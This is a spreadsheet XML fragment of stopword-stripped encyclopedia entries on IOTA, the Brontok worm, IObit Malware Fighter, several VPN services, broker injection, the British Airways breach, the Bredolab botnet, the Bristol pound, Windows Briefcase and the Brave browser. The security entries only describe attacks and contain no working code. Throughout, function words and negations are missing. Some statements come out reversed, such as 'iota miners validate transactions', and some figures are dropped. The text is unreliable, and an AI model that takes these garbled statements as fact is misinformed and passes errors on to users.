  <si>
    <t>iota open-source distributed ledger cryptocurrency designed internet things (iot). uses directed acyclic graph store transactions ledger, motivated potentially higher scalability blockchain based distributed ledgers. iota miners validate transactions, instead, nodes issue transaction network must approve previous transactions. transactions therefore issued without fees, facilitating microtransactions. network currently achieves consensus coordinator node, operated iota foundation. coordinator single point failure, network currently centralized.iota criticized unusual design, unclear whether work practice. result, iota rewritten ground network update called chrysalis, iota 1.5, launched april 2021. update, controversial decisions ternary encoding quantum proof cryptography left behind replaced established standards. testnet follow-up update called coordicide, iota 2.0, deployed late 2020, releasing distributed network longer relies coordinator consensus 2021. history value transfer protocol iota, named smallest letter greek alphabet, created 2015 david sønstebø, dominik schiener, sergey ivancheglo, serguei popov. initial development funded online public crowdsale, participants buying iota value token digital currencies. approximately 1300 raised, corresponding approximately us$500,000 time, total token supply distributed pro-rata initial investors. iota network went live 2016. iota foundation 2017, early iota token investors donated total token supply continued development endow became later became iota foundation. 2018, iota foundation chartered stiftung berlin, goal assist research development, education standardisation iota technology. iota foundation board member international association trusted blockchain applications (inatba), founding member trusted alliance mobility open blockchain initiative (mobi), promote blockchain distributed ledgers regulatory approaches, ecosystem mobility. following dispute iota founders david sønstebø sergey ivancheglo, ivancheglo resigned board directors june 2019. december 2020 iota foundation board directors supervisory board announced foundation officially parted ways david sønstebø. vulnerability disclosure september 2017, researchers ethan heilman boston university neha nerula mit's digital currency initiative (dci) reported potential security flaws iota's former curl-p-27 hash function. iota foundation received considerable backlash handling incident. alphaville reported legal posturing iota founder security researcher involvement report, well instances aggressive language levelled forbes contributor unnamed journalists covering report. center blockchain technologies university college london severed ties iota foundation legal threats security researchers involved report. attacks speculative blockchain cryptocurrency-related technology, iota target phishing, scamming, hacking attempts, resulted thefts user tokens extended periods downtime. january 2018, us$10 million worth iota tokens stolen users used malicious online seed-creator, password protects ownership iota tokens. seed-generator scam largest fraud iota history date, victims. january 2019, german enforcement agencies arrested 36-year-old oxford, england believed behind theft.on november 2019 hacker discovered vulnerability third-party payment service, provided moonpay, integrated mobile desktop wallet managed iota foundation. attacker compromised iota seeds, resulting theft approximately us$2 million worth iota tokens. after receiving reports hackers stealing funds user wallets, iota foundation shut coordinator february 2020. this side-effect effectively shutting entire iota cryptocurrency. users at-risk given seven days migrate potentially compromised seed seed, march 2020. coordinator restarted march 2020. iota (chrysalis) iota (coordicide) iota network currently centralized, transaction network considered valid referenced milestone issued node operated iota foundation called coordinator. 2019 iota foundation announced would like operate network without coordinator future, using two-stage network update, termed chrysalis iota coordicide iota 2.0. chrysalis update went live april 2021, removed controversial design choices ternary encoding winternitz one-time signatures, create enterprise-ready blockchain solution. parallel coordicide currently developed, create distributed network longer relies coordinator consensus. testnet coordicide deployed late 2020, releasing final version 2021. characteristics tangle tangle moniker used describe iotas directed acyclic graph (dag) transaction settlement data integrity layer. structured string individual transactions interlinked stored network node participants. tangle miners validating transactions, rather, network participants jointly responsible transaction validation, must confirm transactions already submitted network every transaction issue. transactions therefore issued network cost, facilitating micropayments. avoid spam, every transaction requires computational resources based proof work (pow) algorithms, find answer simple cryptographic puzzle.iota supports value data transfers. second layer protocol provides encryption authentication messages, data streams, transmitted stored tangle zero-value transactions. each message holds reference address follow-up message, connecting messages data stream, providing forward secrecy. authorised parties correct decryption therefore follow datastream point entry. when owner data stream wants revoke access, change decryption publishing message. this provides owner granular controls data exchanged authorised parties. iota token iota token unit value iota network. there fixed supply 2,779,530,283,277,761 iota tokens circulation iota network. iota tokens stored iota wallets protected 81-character seed, similar password. access spend tokens, iota provides cryptocurrency wallet. hardware wallet used keep credentials offline facilitating transactions. coordinator node iota currently requires majority honest actors prevent network attacks. however, concept mining exist iota network, unlikely requirement always met. therefore, consensus currently obtained referencing transactions issued special node operated iota foundation, called coordinator. coordinator issues zero value transactions given time intervals, called milestones. transaction, directly indirectly, referenced milestone considered valid nodes network. coordinator authority operated iota foundation single point failure iota network, makes network centralized. markets iota traded megaiota units (1,000,000 iota) digital currency exchanges bitfinex, listed miota ticker symbol. like digital currencies, iota's token value soared fallen. fast probabilistic consensus (fpc) crux cryptocurrencies stop double spends, ability spend money twice simultaneous transactions. bitcoin's solution proof work (pow) making significant financial burden minted block rejected double spend. iota designed voting algorithm called fast probabilistic consensus form consensus double spends. instead starting scratch, iota foundation started simple majority consensus first opinion update defined otherwise {\displaystyle s_{i}(1)={\begin{cases}1&amp;\mu _{i}(1)\geq \tau \\0&amp;{\text{otherwise}}\end{cases}}} where {\displaystyle s_{i}(\cdot opinion node {\displaystyle time {\displaystyle function {\displaystyle _{i}(1)} percent nodes opinion {\displaystyle {\displaystyle \tau (0.5,1]} threshold majority, implementation. after first round, successive opinions change time {\displaystyle function, otherwise {\displaystyle s_{i}(t+1)={\begin{cases}1&amp;\mu _{i}(t+1)&gt;0.5\\0&amp;\mu _{i}(t+1)&lt;0.5\\s_{i}(t)&amp;{\text{otherwise}}\end{cases}}} although, model fragile malicious attackers iota foundation decided instead iota foundation decided augment leaderless consensus mechanism called, random neighbors majority consensus (rmc) similar although, nodes opinions queries randomized. they took augmented create threshold majority random number generated decentralized random number generator (drng). fpc, first sound same, otherwise {\displaystyle s_{i}(1)={\begin{cases}1&amp;\mu _{i}(1)\geq \tau \\0&amp;{\text{otherwise}}\end{cases}}} success rounds though, otherwise {\displaystyle s_{i}(t+1)={\begin{cases}1&amp;\mu _{i}(t+1)&gt;u_{t}\\0&amp;\mu _{i}(t+1)&lt;u_{t}\\s_{i}(t)&amp;{\text{otherwise}}\end{cases}}} where {\displaystyle u_{t}\sim {\textbf {u}}(\beta ,1-\beta {\displaystyle \beta [0,1/2]} randomized threshold majority. randomizing threshold majority makes extremely difficult adversaries manipulate consensus either making converge specific value prolonging consensus. note utilized form consensus transaction double spend.ultimately, iota uses fast probabilistic consensus consensus uses proof work rate controller. because iota consensus, overall network energy transaction extremely small. applications testbeds proof-of-concepts building iota technology developed automotive industry corporates jaguar land rover, stmicroelectronics bosch. iota participant smart city testbeds, establish digital identity, waste management local trade energy. project alvarium, formed linux foundation, iota used immutable storage validation mechanism. privacy centered search engine xayn uses iota trust anchor aggregated model.on february 2020, eclipse foundation iota foundation jointly launched tangle (enterprise edition) working group. tangle aimed enterprise users take iota technology enable larger organizations build applications project, eclipse foundation provide vendor-neutral governance framework .announcements partners critically received. 2017, iota released data marketplace, pilot market connected sensors devices store, sell purchase data. data marketplace received critically cryptocurrency community extent involvement participants data marketplace, suggesting "the iota foundation actively asking publications microsoft’s name following data marketplace announcement.". izabelle kaminska criticized jaguar press release: "our interpretation unlikely jaguar bringing smart-wallet-enabled marketplace time soon." criticism iota promises achieve benefits blockchain-based dlts bring decentralization, distribution, immutability trust remove downsides wasted resources associated mining well transaction costs. however, several design features iota unusual, unclear whether work practice.the security iota's consensus mechanism double-spending attacks unclear, long network immature. essentially, iot, heterogeneous devices varying levels computational power, sufficiently strong computational resources render tangle insecure. this problem traditional proof-of-work blockchains well, however, provide much greater degree security higher fault tolerance transaction fees. beginning, lower number participants incoming transactions, central coordinator needed prevent attack iota tangle.critics opposed role coordinator single source consensus iota network. polychain capital founder olaf carlson-wee, says "iota decentralized, even though iota makes claim, central "coordinator node" network needs operate. regulator hacker shut coordinator node, network would down." this demonstrated trinity attack incident, iota foundation shutdown coordinator prevent thefts. following discovered vulnerability october 2017, iota foundation transferred potentially compromised funds addresses control, providing process users later apply iota foundation order reclaim funds.additionally, iota seen several network outages result bugs coordinator well ddos attacks. early seed generator scam, ddos network attack distracted iota admins, leaving initial thefts undetected. 2020, iota foundation announced would like operate network without coordinator future, implementation still early development phase. references external links official website</t>
  </si>
  <si>
    <t>Brontok</t>
  </si>
  <si>
    <t>brontok computer worm running microsoft windows. able disperse e-mail. variants include: brontok.a brontok.d brontok.f brontok.g brontok.h brontok.i brontok.k brontok.q brontok.u brontok.bh other names other names worm include: w32/rontokbro.gen@mm, w32.rontokbro@mm, backdoor.generic.1138, w32/korbo-b, worm/brontok.a, win32.brontok.a@mm, worm.mytob.gh, w32/brontok.c.worm, win32/brontok.e, win32/brontok.x@mm, w32.rontokbro.d@mm. origin brontok originated indonesia. first discovered 2005. name refers elang brontok, bird species native south southeast asia. arrives attachment e-mail named kangen.exe (kangen means miss someone/thing"). virus/email contains message indonesian (and english). when translated, reads: [by: hvm31 jowobot community] stop collapse country—1. hoodlums, smugglers, bribers, gamblers, drugs port (send "nusakambangan") 2.stop free sex, abortion, prostitution hell) 3.stop (sea river pollution), forest burning, wild hunting. 4.say drugs!!! near think smart? inspired (spizaetus cirrhatus) almost extinct [by: hvm31 jowobot communityunity also contains javascript pop-up. worm also carried ping flood attack websites: israel.gov.il playboy.com, possibly hacktivism. number websites .com also attacked, prompting popular indonesian forum kaskus switch 2012. brontok inspired creation persistent trojan/worm daprosy worm attacked internet cafes july 2009. symptoms when brontok first run, copies user's application data directory. sets start windows, creating registry entry hklm\software\microsoft\windows\currentversion\run registry key. disables windows registry editor (regedit.exe) modifies windows explorer settings. removes option "folder options" tools menu hidden files, concealed, easily accessible user. also turns windows firewall. variants, window found containing certain strings (such "application data") window title, computer reboots. user frustration also occurs address typed windows explorer blanked completion. using mailing engine, sends email addresses finds computer, even faking user's email address sender. computer also restarts trying open windows command prompt prevents user downloading files. also default browser loads page (html) located pictures" windows vista, "pictures") folder. creates .exe files folders usually named folder (..\documents\documents.exe) also includes mapped network drives. removal brontok removed antivirus software although various standalone tools available antivirus providers. references</t>
  </si>
  <si>
    <t>IObit Malware Fighter</t>
  </si>
  <si>
    <t>iobit malware fighter (introduced 2004) anti-malware anti-virus program microsoft windows operating system (windows later). designed remove protect malware, including, limited trojans, rootkits, ransomware. overview iobit malware fighter freeware version, alongside user's existing anti-virus solution. paid edition, product comes anti-virus protection. version released 2018, product includes bitdefender engine commercial version, along anti-malware engine. features latest release includes improved user interface called "safe box" created protect specific folders unauthorized access, "mbr guard" protects user's system malicious attacks petya cryptocurrency mining scripts. releases 2010, first beta iobit malware fighter released public. 2013, iobit malware fighter released. version, iobit debuted "cloud security" component, user upload file cloud determine whether malicious not. 2015, version released, then, 2016, version added bitdefender anti-virus engine commercial edition. 2017, version released. among features anti-ransomware component. version released 2018. 2018, version released. added features, including safe box, guard. reception november 2011, free paid versions iobit malware fighter reviewed bright hub, reviewer unable recommend product, citing poor malware protection. 2013, iobit malware fighter received "dismal" score, half star five, paid version magazine. december 2013, paid version iobit malware fighter received star rating softpedia. march 2015, commercial version iobit malware fighter received negative review magazine, reviewer calling product "useless". iobit malware fighter received star editors rating cnet's download.com. 2017, magazine gave paid version iobit malware fighter star rating. july 2017, techradar gave iobit malware fighter paid version half star rating, reviewer complained product's overall protection malware. 2018, iobit malware fighter received negative review reviewedbypro.com website reviewer stating software capable protecting entire family, heavy internet users defenses reliable security features work well”. also iobit uninstaller references external links official website</t>
  </si>
  <si>
    <t>IPVanish</t>
  </si>
  <si>
    <t>ipvanish (also known ipvanish) service based united states, applications microsoft windows, macos, android, ios, fire manual configuration available chromeos, windows phone, linux, dd-wrt routers. history ipvanish founded 2012 mudhook media inc., independent subordinate highwinds network group orlando, florida. service started servers client windows operating systems. later years, software support expanded include macos, ios, android, fire owns controls private fiber-optic network tier-1 servers. ipvanish owns roughly points presence (pops), company controls data center hardware, "the rack stack." infrastructure leased third-party operators regions "where doesn’t make sense gear," albania. 2017, highwinds network group acquired company stackpath included ipvanish part acquisition. 2019, ipvanish many services acquired global netprotect business. logging controversy according june 2018 article torrentfreak, court documents shown ipvanish handed personal information customer department homeland security (hsi) 2016. customer suspected sharing child pornography network. information, allowed identify customer, consisted customer's name, email address, details subscription, real address (comcast) well dates times [he] connected disconnected from, network.” logging customer's address connection timestamps service contradicts ipvanish's privacy policy, states "[ipvanish] never traffic usage vpn." 2017, ipvanish parent company acquired stackpath, founder ceo, lance crosby, claims time acquisition, [...] logs existed, logging systems existed previous/current/future intent save logs existed." story attracted attention reddit, court documents posted /r/piracy subreddit. technical details features ipvanish offers several features, including: ipv6 leak protection leak protection openvpn scramble socks5 proxy unlimited bandwidth unlimited address cycling port forwarding access udp/tcp internet kill switch encryption encryption, ipvanish uses openvpn ikev2/ipsec technologies applications, l2tp pptp connection protocols also configured. ipvanish supports (128-bit 256-bit) specifications, sha-256 authentication rsa-2048 handshake. servers ipvanish owns operates 1500 remote servers locations. largest concentration servers located united states, united kingdom, australia. company suspended operations russia july 2016, conflicts company's zero-log policy local law. july 2020, ipvanish removed servers hong kong, alleging hong kong national security puts hong kong “same tight internet restrictions govern mainland china.” ipvanish maintains headquarters united states, mandatory data retention laws. uses ipvanish funnels internet traffic users remote servers service, hiding user's address encrypting data transmitted connection. users simultaneously connect unlimited number devices.like services, ipvanish also ability bypass internet censorship countries. selecting server region outside physical position, ipvanish user easily access online content available location otherwise. ipvanish used play games regionally-restricted licensing agreements. 2017 review service, named ipvanish “one best gaming vpns.” during speed test league legends, reviewer noted ping drop millisecond. recognition ipvanish generally received positive reviews online publications industry associations, often recognized expensive competition. 2016, ipvanish awarded silver award startup year info security pg's global excellence awards lifehacker rated service vpn. magazine rated ipvanish “excellent” april 2017 review, praising nonrestrictive bittorrent practices noting expensive vpns.in 2018 review highlighting ipvanish ‘zero logs’ policies nonprofit support, cnet ranks ipvanish best services year. reviewer also noted integrated plugin kodi, open-source media streaming app, unique industry. techradar rated service stars march 2018 review, commending powerful features criticizing “lethargic support response”. annually-updated torrentfreak article reviewing logging policies services lists ipvanish anonymous provider. tom's guide wrote lack kill switch mobile application "may downside some". related media september 2015, ex-husband phillip morris tobacco heiress, anne resnick, accused hacking estranged wife’s phone divorce proceedings. during deposition, husband plead fifth amendment times questioned bank records indicating subscriptions mspy well ipvanish. also comparison virtual private network services internet privacy encryption secure communication references</t>
  </si>
  <si>
    <t>IPredator</t>
  </si>
  <si>
    <t>ipredator service offered stated goal providing internet privacy. co-founded peter sunde, response introduction ipred sweden, allow copyright holders enforcement officials request personal information copyright infringement suspects. history august 2009, beta testing invitations sent entered email addresses beta signup form. additionally, homepage changed reflect beta. service initially used pptp (supported natively vista, windows linux pptp-linux) tunnel connection servers (vpn.ipredator.se resolves multiple addresses) located sweden. september 2009, ipredator "the second batch" became available public consumption.on november 2009, ipredator became publicly available exited beta stage. this done response coming effect december 1st, would allow intercept internet communications crossing swedish border. concert, pirate changed logo december 2009, image depicting glass joe, first weakest opponent video game punch-out!!. image linked ipredator's website message "fra ipredator it's on!" openvpn support added august 2012.in july 2013, paypal stopped providing payment services ipredator. addition, organization's funds frozen days. account reinstated next month. conversely paysafecard, many customers switched paypal unavailable, canceled support ipredator.in october 2020, ipredator merged njalla, privacy-focused domain name hosting service also founded sunde. also comparison virtual private network services references external links official website</t>
  </si>
  <si>
    <t>Broker injection</t>
  </si>
  <si>
    <t>broker injection attack type vulnerability exploits misconfigured brokers, potentially allowing attacker read, write inject information from/into flow. description there many scenarios broker used transport information tasks. typical cases send e-mails background. scenario we'll actors: information producer website, example). worker background process actually sends e-mail.the producer needs asynchronous non-blocking send email information worker. this system usually broker. takes information front-end passes worker, generating task worker. worker information send e-mail. taking scenario example, could access broker, would able make worker generate tasks arbitrary data, unleashing broker injection. attacks with mind, could make following attacks: listing remote tasks. reading remote task's contents. injection tasks remote processes. removing remote outstanding tasks. origin broker injection attack new, name. this name coined daniel garcía (cr0hn) rootedcon 2016 conference spain. also redis rabbitmq zeromq message broker celery (software) external links official redis security tips enteletaor: broker injection tool broker injection rootedcon 2016 (spanish)</t>
  </si>
  <si>
    <t>British Airways data breach</t>
  </si>
  <si>
    <t>2018 data breach affected 380,000 500,000 customers british airways. attack british airways said attack affected bookings august 2018 september 2018 credit card details around 380,000 customers compromised. attackers obtained names, street addresses, email addresses, credit card numbers, expiration dates card security codes enough allow thieves steal accounts.one customer airline reported card used items phone harrods malaysia. attempt rejected customer think card exposed except attack. aftermath british airways urged customers contact banks credit card issuer follow advice. natwest said received calls usual breach. american express said customers would need take action would alert customers unusual activity cards. analysis information commissioner's office said attack begun june 2018. consequences british airways british airways issued £183 million fine information commissioner's office, biggest fine issued office date. roughly times previous record, £500,000 fine imposed facebook cambridge analytica scandal.the facebook fine heaviest could imposed time mirroring gdpr introduced facebook british airways scandals. fine 1.5% airline's worldwide turnover 2017. maximum laws would worldwide turnover, would approached £500 million.ceo chairman álex cruz said airline "surprised disappointed" ico's finding.in october 2020 british airways fined million information commissioner's office, considerably smaller £183 million fine originally intended. references also easyjet hack</t>
  </si>
  <si>
    <t>IThenticate</t>
  </si>
  <si>
    <t>ithenticate plagiarism detection service corporate market, turnitin, llc, also runs plagiarism.org. service launched 2004 headquartered oakland, california. marketed "publishers, news agencies, corporations, firms, government agencies". 2007, clients included world health organization, united nations, world bank.while ithenticate best known plagiarism detection service, collaborative efforts user base created number cases. prominent aside plagiarism detection include intellectual property protection document-versus-document(s) analysis. ithenticate also allows integration content management systems (cmss) manuscript tracking systems (mtss).crosscheck powered ithenticate re-branded version ithenticate service developed partnership crossref, community notable scientific, technical, medical publishers. crosscheck received association learned professional society publishers award publishing innovation 2008.following 2004 high-profile case hartford courant, newspaper subscribed ithenticate. company extended invitations newspapers, stated would maintain confidentiality subscribers.the company made headlines july 2006, york post reported ithenticate software found several passages plagiarism coulter's book, godless. both coulter's syndicator publisher rejected claims, describing irresponsible stating minimal text matching common subjects equal plagiarism. also turnitin references external links official website</t>
  </si>
  <si>
    <t>IVPN</t>
  </si>
  <si>
    <t>ivpn service offered privatus limited based gibraltar. privatus limited independently audited cure53 undergone no-logging audit comprehensive pentest report. they accept bitcoin, monero, paypal, credit cards, cash payment methods clients open source. ivpn services support flashrouters, company specializes providing custom-flashed routers users. reception september 2017, pcworld review wrote service dearer providers, good bandwidth speeds transparent privacy policy.the service also reviewed magazine, torrentfreak also comparison virtual private network services internet privacy encryption secure communication list free open-source android applications references external links official website ivpn google play ivpn android package f-droid repository</t>
  </si>
  <si>
    <t>Bristol pound</t>
  </si>
  <si>
    <t>bristol pound (£b) form local, complementary, and/or community currency launched bristol, september 2012. objective encourage people spend money local, independent businesses bristol, businesses turn localise supply chains. point close digital scheme august 2020, largest alternative official sterling currency, backed sterling. digital currency ceased operating august 2020 bristol pound accounts reverted sterling accounts bristol credit union. bristol pound process developing bristol pay, seeks offer e-money peer peer payment platform generate income charitable projects city, create range token systems encourage culture change people think economic value relation social capital environmental capital. final issue paper currency remains date september 2021, given many businesses trying reduce risk fomite transmission covid-19, paper currency longer issued. souvenir notes still available bristol pound website. background bristol pound local, complementary, and/or community currency created "improve bristol's local economy". primary support independent traders order maintain diversity business around city. scheme joint not-for-profit enterprise bristol pound community interest company bristol credit union.previous bristol pound, local currencies launched totnes (2006), lewes (2008), brixton (2009) stroud (2010). effect local economy theory according 2002 economics foundation publication, money re-spent locally '... attracting money area.' person spends pound local shop, owner shop re-spend buying supplies another local business, paying local taxes (business rates council tax) council. process repeated exchanges kept within local economy. this local circulation lead additional economic benefits area; called local multiplier effect. comparison, sterling pounds spent supermarket chain typically leads money leaving area almost immediately.as well potentially stimulating local economy create stronger bonds within community; increasing social capital. buying locally decrease emissions locally produced good require less transportation. local trade complementary currencies resilience strategy; reducing impact national economic crises dependency international trade, enhancing self-sufficiency. also increase awareness impact one's economic activity. research 2017, bristol post reported research suggested bristol pound venture small effect significant change localism increased local wealth production. spokesperson bristol pound claimed findings contradicted previous research university bristol. usage bristol first city taxes business rates could paid local currency. bristol pound account holders convert sterling ratio. bristol city council, organisations city, offer employees option take part salaries bristol pounds. former mayor bristol, george ferguson, accepted entire salary (£51,000) bristol pounds.from june 2015 energy bills able paid bristol pounds 100% renewable energy provider, good energy. claimed world first paying energy bills using local currency.in june 2015, according bristol pound ceo, million issued £bs, £b700,000 still circulation. more businesses accept bristol pounds thousand users bristol pound account.by late 2017, five million bristol pounds spent. however, stage, usage currency beginning decline. march 2020, bristol post reported currency faced uncertain future. however, april 2021, bristol pound still exists focused developing range money token based systems continue wider mission helping create local economy environmentally sustainable, socially resilient external shocks. organisation partnerships bristol pound managed non-profit bristol pound community interest company collaboration local financial institution, bristol credit union. bristol credit union ensures every sterling converted printed backed secure trust fund. scheme supported bristol city council, although council substantially reduced financial support 2018.bristol pound involved digipay4growth project, coordinated social trade organisation partners sardex. through project bristol pounds digitalised currency, using cyclos software.bristol pound part larger international movement local currencies. european funded community currencies action partnership provided support communities want develop currency works innovations. within bristol pound founded guild independent currencies platform sharing experiences local currencies later became independent money alliance. framework, bristol assisted exeter, amongst others, helping launch local currency; exeter pound. whilst formal group longer exists, bristol pound remains closely linked economy local currency groups europe around world. using bristol pound bristol pound used paper electronic format, like conventional money. bristol pound equivalent sterling pound. some businesses apply discounts customers paying bristol pounds. local taxes electricity bills paid bristol pounds online. paper bristol pounds paper used anyone, designed bristolians, carry many high security features prevent fraud. june 2015 paper issued. these exchanged rate sterling seventeen different cash points throughout city, ordered online bristol pound website. electronic payments bristol pound second local scheme (after brixton pound) able accept electronic payments this allows, example, participating small businesses accept payments sms, without needing install credit card machine. businesses latterly charged amount billed payments made sms, similar sometimes reduced rate credit debit cards, paypal (3%). payments also made online, recipient payment charged rate capped transaction. legality every paper backed sterling deposited bristol credit union. bristol pound legal tender, participation therefore voluntary. directors scheme cannot prevent national multinational companies accepting paper £bs, decide, based rules membership, whether business permitted open bristol pound account trade electronically.bristol pounds exchanged back sterling electronic bristol pound account. there this. paper bristol pounds cannot directly exchanged back sterling unless first deposited electronic account. technically, notes vouchers first issue paper bristol pounds also expiry date september 2015). bank england acknowledges existence role local currencies. awards bristol pound contributed bristol awarded title european green capital 2015. also bank charter 1844 cyclos community currency local currency exeter pound economics foundation brixton pound lewes pound monero stroud pound totnes pound berkshares scrip references external links official website</t>
  </si>
  <si>
    <t>Briefcase (Microsoft Windows)</t>
  </si>
  <si>
    <t>microsoft windows, briefcase special folder supports simple two-way file synchronization another folder. briefcase designed mobile users transfer removable drive synchronize computer removable drive attached. follows metaphor file file folder then, file management tasks performed windows explorer, briefcase behaves like another folder, i.e. support copy-paste drag-and-drop. additional functions toolbar buttons updating out-of-sync files. windows briefcase introduced windows deprecated (although removed) windows completely disabled (but still present accessible modification windows registry) windows finally removed windows build 14942. overview windows briefcase synchronizes files folders within folder, even removable writable media network. intended users portable media multiple computers. briefcase, users need windows explorer drag copy files briefcase once. changes either files disk briefcase synchronized whenever user right-clicks briefcase selects update all.if differences copies, briefcase shows dialog icon description indicating action take synchronizing; whether replace copy briefcase external file vice versa, leave versions unchanged. action briefcase take configurable right clicking icon. example, users skip synchronizing individual items selecting skip action upon right clicking icon. items deleted either briefcase main original folder, briefcase create copy missing item. users also sync individual items briefcase selecting item first clicking update button instead update all. update status item stored briefcase. item link original item outside briefcase, (for example drive containing briefcase inserted secondary computer, original deleted main computer) called orphan. internals most special folders windows (such briefcase folders) hidden file (with "system" attribute) called desktop.ini. they also windows registry entries describing them. desktop.ini briefcase contains following lines: [.shellclassinfo] clsid={85bbd920-42a0-1069-a2e4-08002b30309d} confirmfileop=0 runwizard=0 [briefcase] database=briefcase database clsid setting specifies class identifier "briefcase" class, required folder appear briefcase. confirmfileop setting appears effect. runwizard setting specifies whether display "welcome windows briefcase" dialog user opens briefcase. this setting removed dialog displayed first time.a second file called "briefcase database", bearing "hidden" "system" attributes, filename extension, serves briefcase index. fourcc "ddsh". briefcase folder must "read-only" "system" file attributes (default read-only) order display briefcase. desktop.ini briefcase database files required hidden system attributes order parent folder display briefcase. briefcase reconciler when microsoft access installed, windows briefcase gets special functionality installed microsoft office files. used replication tool access databases database engine dragging .mdb file briefcase database automatically converted replicable form. design master left source replica briefcase vice versa. when synchronizing, replicas merged briefcase reconciler. windows shell also allowed developers create document briefcase reconcilers combine different input versions document produce single, output version document. also comparison file synchronization software onedrive client apps references</t>
  </si>
  <si>
    <t>Brian Krebs</t>
  </si>
  <si>
    <t>Bredolab botnet</t>
  </si>
  <si>
    <t>bredolab botnet, also known alias oficla, russian botnet mostly involved viral e-mail spam. before botnet eventually dismantled november 2010 seizure command control servers, estimated consist millions zombie computers. operations though earliest reports surrounding bredolab botnet originate 2009 (when first malware samples bredolab trojan horse found) botnet rise prominence august 2009, major surge size botnet. bredonet's main form propagation sending malicious e-mails included malware attachments would infect computer opened, effectively turning computer another zombie controlled botnet. peak, botnet capable sending billion infected emails every day. main form propagation drive-by downloads method exploits security vulnerabilities software. this method allowed botnet bypass software protection order facilitate downloads without user aware them.the main income botnet generated leasing parts botnet third parties could subsequently infected systems purposes, security researchers estimate owner botnet made $139,000 month botnet related activities. rental business strategy, payload bredolab diverse, ranged scareware malware e-mail spam. dismantling aftermath october 2010, team dutch enforcement agents seized control servers contained three command control servers, database server several management servers bredolab botnet datacenter leaseweb, effectively removing botnet herder's ability control botnet centrally. attempt regain control botnet, botnet herder utilized 220,000 computers still control, unleash ddos attack leaseweb servers, though attempts ultimately vain. after taking control botnet, enforcement team utilized botnet send message owners infected computers, stating computer part botnet.subsequently, armenian enforcement officers arrested armenian citizen, georgy avanesov, basis suspected mastermind behind botnet. suspect denied involvement botnet. sentenced four years prison 2012.while seizure command control servers severely disrupted botnet's ability operate, botnet still partially intact, command control servers persisting russia kazakhstan. security firm fireeye believes secondary group botnet herders taken remaining part botnet purposes, possibly previous client reverse engineered parts original botnet creator's code. even group noted botnet's size capacity severely reduced enforcement intervention. references</t>
  </si>
  <si>
    <t>Brave (web browser)</t>
  </si>
  <si>
    <t>brave free open-source browser developed brave software, inc. based chromium browser. brave privacy-focused browser, automatically blocks online advertisements website trackers default settings. also provides users choice turn optional users attention form basic attention tokens (bat) cryptocurrency. users send contributions websites content creators, support form tips along ability keep cryptocurrency earned.brave software's headquarters francisco, california.as july 2022, brave million monthly active users, 19.2 million daily active users network million content creators. history 2015, brendan eich brian bondy founded brave software. january 2016, brave software launched first version brave ad-blocking capabilities announced plans privacy-respecting platform.in june 2018, brave released pay-to-surf test-version browser. this version brave came preloaded approximately sent detailed user's browsing activity brave short-term purpose testing functionality. brave announced expanded trials would follow. later month, brave added support desktop browser's private-browsing mode.until december 2018, brave fork electron called muon, marketed "more secure fork". nevertheless, brave developers moved chromium, citing need ease maintenance burden. brave software released final muon-based version intention would stop working instructed users update end-of-life approached.in june 2019, brave started testing ad-blocking rule-matching algorithm implemented rust, replacing previous one. ublock origin ghostery algorithms inspired logic, brave claims average times faster previous algorithm.brave launched stable release, version 1.0, november 2019, million monthly active users overall. time, approximately million active users daily basis. brave 1.0, running android, ios, windows macos, linux, integrated "almost brave's marquee features across platforms", according engadget.in november 2020, brave reported million monthly users, and, september 2021, passed million monthly active users.in march 2021, brave built search engine tailcat, acquired earlier year cliqz, subsidiary hubert burda media based germany. tailcat designed deliver search results without logging user activity creating profiles.in april 2021, brave became first browser added epic games store.in june 2021, public beta brave search, brave software's search engine, launched. exited beta phase june 2022 along announcement within year-long beta testing period brave search surpassed billion total queries. business model brave uses basic attention token (bat) drive revenue. originally incorporated delaware hyperware labs, inc. 2015, company later changed name brave software, inc. registered california, headquartered.by august 2016, company received least us$7 million angel investments venture capital firms, including peter thiel's founders fund, propel venture partners, pantera capital, foundation capital, digital currency group.in november 2019, brave launched brave ads, network. brave software takes revenue rest given back users. consumers browse, presented advertisements. features brave firewall brave firewall browser based system wide firewall ios. uses guardian vpn. brave search brave search search engine developed brave released beta form march 2021, following acquisition tailcat, privacy-focused search engine cliqz. since october 2021, brave search default search engine brave browser users canada, france, germany. brave wallet brave wallet native crypto wallet extensions required. supports compatible chains (polygon, xdai, avalanche, etc.) chains. brave wallet support limited desktop browser planned extended mobile browsers. addition, brave wallet used store non-fungible tokens. brave wallet (legacy) brave wallet (legacy) fork metamask, comes pre-installed brave browser. this lets browser interact websites supporting metamask api's sign crypto transactions supported ethereum virtual machine networks. brave swap brave swap aggregator cryptocurrency dex's based lets users swap ethereum tokens tokens within browser. brave makes money taking small "router" fee. plans return user form tokens privacy user data kept private user's device accessible third party. browsing data sent brave's servers, user device browsing data. research study analyzing browser privacy professor douglas leith university dublin reported brave highest level privacy browsers tested. brave "any identifiers allowing tracking address overtime, sharing details pages visited backend servers". prevent browser fingerprinting, brave uses fingerprint randomization, makes browser look different websites browser restart, ensure brave's users uniquely identified tracked periodically using browser fingerprinting. october 2021, brave announced privacy feature dubbed "debouncing". feature designed disarm bounce tracking, method internet tracking intermediary domains load users click link. debouncing automatically recognize users visit known tracking domain renavigates user intended destination, skipping tracking site altogether.tests conducted digital trends found brave mainstream browser pass electronic frontier foundation's cover your tracks test.in april 2022, brave announced de-amp feature bypasses google's system, directing user straight original website instead. company cited privacy feature, calling "harmful users large". brave shields brave shields engine inspired ublock origin others, blocks third-party trackers similar fashion extension-based blockers. advertisement blocking features enabled default. users given control adjust blocking, script, cookies settings shields privacy section browser. well cookie-based trackers, brave shields also protect fingerprint tracking using technique calls "farbling", allowing browser session appear unique. brave talk browser-based, privacy-focused video conferencing tool based jitsi. integrated brave september 2021. march 2022, brave talk widget made visible default page. brave rewards since april 2019, users brave browser brave rewards feature, enables users earn reward viewing privacy-preserving earned number ways. users earn viewing advertisements displayed notifications operating system computer device native pop-up window. advertising campaigns matched users inference browsing history; targeting carried locally, transmission personal data outside browser. users choose send micropayments websites content creators within ecosystem. site owners creators must first register brave publisher. users either turn auto-contribute, automatically divides specified monthly contribution proportion time spent, manually send chosen amount (referred tip) visiting site creator. addition alternatively, users withdraw verified uphold gemini wallet. first version micropayments feature launched 2016 name "brave payments" used bitcoin. advertisements shown separate browser tab. other features sugarcoat: tool integrated brave since fourth quarter 2021 automatically replaces tracking libraries spoofed, privacy-preserving replacement increase site compatibility adblocking scripts. tor: brave offers support desktop version. users switch tor-enabled browsing clicking hamburger menu right corner browser. interplanetary file system (ipfs): january 2021, brave became first browsers offer native integration 